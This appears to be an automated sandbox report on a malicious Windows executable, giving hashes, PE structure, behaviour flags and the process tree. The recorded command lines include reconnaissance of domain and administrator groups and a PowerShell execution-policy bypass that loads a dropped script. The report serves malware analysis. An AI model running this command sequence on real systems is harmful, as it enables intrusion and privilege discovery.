General Info

File name

6_URL_ii.exe

Full analysis
https://app.any.run/tasks/984b2407-aeb0-4402-a1df-316079fe768a
Verdict
Malicious activity
Analysis date
3/14/2019, 10:27:19
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

evasion

Indicators:

MIME:
application/x-dosexec
File info:
PE32 executable (console) Intel 80386, for MS Windows
MD5

21e49843502325b063b4d52e8c297f79

SHA1

64c034034e675b89295c7de91f9c754d5880ff01

SHA256

69ff04aa3967dd2747e33cd97e7517026d49eaf13340774b6a0d5d7fd95ac35f

SSDEEP

196608:kLVzgNyHgd0zCZNulPKQ8hY/Bkr/fgIT/+Vdl7FKaz:EDgGzuN/HYOcIT/EXF9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Loads dropped or rewritten executable
  • WMIC.exe (PID: 2568)
  • 6_URL_ii.exe (PID: 4068)
Starts NET.EXE to view/change users group
  • cmd.exe (PID: 3832)
  • cmd.exe (PID: 3220)
Uses IPCONFIG.EXE to discover IP address
  • cmd.exe (PID: 2368)
  • 6_URL_ii.exe (PID: 4068)
Connects to unusual port
  • 6_URL_ii.exe (PID: 4068)
Creates files in the user directory
  • powershell.exe (PID: 2584)
Executes PowerShell scripts
  • 6_URL_ii.exe (PID: 4068)
Uses NETSTAT.EXE to discover network connections
  • 6_URL_ii.exe (PID: 4068)
Starts CMD.EXE for commands execution
  • 6_URL_ii.exe (PID: 4068)
Executable content was dropped or overwritten
  • 6_URL_ii.exe (PID: 3120)
Loads Python modules
  • 6_URL_ii.exe (PID: 4068)

No info indicators.

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.exe
|   Win64 Executable (generic) (64.6%)
.dll
|   Win32 Dynamic Link Library (generic) (15.4%)
.exe
|   Win32 Executable (generic) (10.5%)
.exe
|   Generic Win/DOS Executable (4.6%)
.exe
|   DOS Executable Generic (4.6%)
EXIF
EXE
MachineType:
Intel 386 or later, and compatibles
TimeStamp:
2018:09:04 16:42:13+02:00
PEType:
PE32
LinkerVersion:
14
CodeSize:
128000
InitializedDataSize:
172032
UninitializedDataSize:
null
EntryPoint:
0x779a
OSVersion:
5.1
ImageVersion:
null
SubsystemVersion:
5.1
Subsystem:
Windows command line
Summary
Architecture:
IMAGE_FILE_MACHINE_I386
Subsystem:
IMAGE_SUBSYSTEM_WINDOWS_CUI
Compilation Date:
04-Sep-2018 14:42:13
DOS Header
Magic number:
MZ
Bytes on last page of file:
0x0090
Pages in file:
0x0003
Relocations:
0x0000
Size of header:
0x0004
Min extra paragraphs:
0x0000
Max extra paragraphs:
0xFFFF
Initial SS value:
0x0000
Initial SP value:
0x00B8
Checksum:
0x0000
Initial IP value:
0x0000
Initial CS value:
0x0000
Overlay number:
0x0000
OEM identifier:
0x0000
OEM information:
0x0000
Address of NE header:
0x00000108
PE Headers
Signature:
PE
Machine:
IMAGE_FILE_MACHINE_I386
Number of sections:
6
Time date stamp:
04-Sep-2018 14:42:13
Pointer to Symbol Table:
0x00000000
Number of symbols:
0
Size of Optional Header:
0x00E0
Characteristics
IMAGE_FILE_32BIT_MACHINE
IMAGE_FILE_EXECUTABLE_IMAGE
IMAGE_FILE_LARGE_ADDRESS_AWARE
Sections
Name Virtual Address Virtual Size Raw Size Charateristics Entropy
.text 0x00001000 0x0001F224 0x0001F400 IMAGE_SCN_CNT_CODE,IMAGE_SCN_MEM_EXECUTE,IMAGE_SCN_MEM_READ 6.65269
.rdata 0x00021000 0x0000B0EC 0x0000B200 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 6.10091
.data 0x0002D000 0x0000E680 0x00000A00 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 1.94098
.gfids 0x0003C000 0x000000B8 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 1.89006
.rsrc 0x0003D000 0x0000EA38 0x0000EC00 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 7.29706
.reloc 0x0004C000 0x000017B8 0x00001800 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_DISCARDABLE,IMAGE_SCN_MEM_READ 6.65088
Resources
1

2

3

4

5

6

7

101

Imports
    KERNEL32.dll

    WS2_32.dll

Exports

    No exports.

Screenshots

Processes

Total processes
46
Monitored processes
15
Malicious processes
2
Suspicious processes
0

Behavior graph

+
start 6_url_ii.exe 6_url_ii.exe cmd.exe no specs wmic.exe no specs cmd.exe no specs net.exe no specs net1.exe no specs cmd.exe no specs net.exe no specs net1.exe no specs powershell.exe no specs cmd.exe no specs ipconfig.exe no specs ipconfig.exe no specs netstat.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3120
CMD
"C:\Users\admin\AppData\Local\Temp\6_URL_ii.exe"
Path
C:\Users\admin\AppData\Local\Temp\6_URL_ii.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\6_url_ii.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\apphelp.dll

PID
4068
CMD
"C:\Users\admin\AppData\Local\Temp\6_URL_ii.exe"
Path
C:\Users\admin\AppData\Local\Temp\6_URL_ii.exe
Indicators
Parent process
6_URL_ii.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\6_url_ii.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\users\admin\appdata\local\temp\_mei31202\python27.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\users\admin\appdata\local\temp\_mei31~1\_ctypes.pyd
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll
c:\users\admin\appdata\local\temp\_mei31~1\_multiprocessing.pyd
c:\users\admin\appdata\local\temp\_mei31~1\_hashlib.pyd
c:\users\admin\appdata\local\temp\_mei31~1\_socket.pyd
c:\users\admin\appdata\local\temp\_mei31~1\_ssl.pyd
c:\users\admin\appdata\local\temp\_mei31~1\win32event.pyd
c:\users\admin\appdata\local\temp\_mei31~1\pywintypes27.dll
c:\users\admin\appdata\local\temp\_mei31~1\win32api.pyd
c:\windows\system32\version.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\users\admin\appdata\local\temp\_mei31~1\_mssql.pyd
c:\users\admin\appdata\local\temp\_mei31~1\msvcr90.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\users\admin\appdata\local\temp\_mei31~1\select.pyd
c:\windows\system32\wsock32.dll
c:\users\admin\appdata\local\temp\_mei31~1\crypto.cipher._arc4.pyd
c:\users\admin\appdata\local\temp\_mei31~1\crypto.cipher._des.pyd
c:\users\admin\appdata\local\temp\_mei31~1\crypto.hash._md4.pyd
c:\users\admin\appdata\local\temp\_mei31~1\crypto.util.strxor.pyd
c:\users\admin\appdata\local\temp\_mei31~1\crypto.cipher._aes.pyd
c:\users\admin\appdata\local\temp\_mei31~1\crypto.cipher._des3.pyd
c:\users\admin\appdata\local\temp\_mei31~1\bz2.pyd
c:\windows\system32\apphelp.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\netstat.exe

PID
2356
CMD
cmd /c wmic ntdomain get domainname
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
6_URL_ii.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wbem\wmic.exe

PID
2568
CMD
wmic ntdomain get domainname
Path
C:\Windows\System32\Wbem\WMIC.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wbem\xml\wmi2xml.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\sxs.dll

PID
3832
CMD
cmd /c net localgroup administrators
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
6_URL_ii.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\net.exe

PID
4044
CMD
net localgroup administrators
Path
C:\Windows\system32\net.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Net Command
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\net.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\mpr.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\net1.exe

PID
2468
CMD
C:\Windows\system32\net1 localgroup administrators
Path
C:\Windows\system32\net1.exe
Indicators
No indicators
Parent process
net.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Net Command
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\net1.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dsrole.dll
c:\windows\system32\netutils.dll
c:\windows\system32\logoncli.dll
c:\windows\system32\browcli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\samlib.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\netmsg.dll

PID
3220
CMD
cmd /c net group "domain admins" /domain
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
6_URL_ii.exe
User
admin
Integrity Level
MEDIUM
Exit code
2
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
3428
CMD
net group "domain admins" /domain
Path
C:\Windows\system32\net.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
2
Version:
Company
Microsoft Corporation
Description
Net Command
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\net.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\mpr.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\apphelp.dll

PID
3744
CMD
C:\Windows\system32\net1 group "domain admins" /domain
Path
C:\Windows\system32\net1.exe
Indicators
No indicators
Parent process
net.exe
User
admin
Integrity Level
MEDIUM
Exit code
2
Version:
Company
Microsoft Corporation
Description
Net Command
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\net1.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dsrole.dll
c:\windows\system32\netutils.dll
c:\windows\system32\logoncli.dll
c:\windows\system32\browcli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\samlib.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\netmsg.dll

PID
2584
CMD
powershell.exe -exec bypass "import-module C:\Users\admin\AppData\Local\Temp\m2.ps1"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
6_URL_ii.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\cabinet.dll
c:\windows\system32\cryptdll.dll
c:\windows\system32\fltlib.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\logoncli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\hid.dll
c:\windows\system32\winscard.dll
c:\windows\system32\winsta.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\vaultcli.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll

PID
2368
CMD
C:\Windows\system32\cmd.exe /c ipconfig /all
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
6_URL_ii.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ipconfig.exe

PID
2556
CMD
ipconfig /all
Path
C:\Windows\system32\ipconfig.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
IP Configuration Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\ipconfig.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
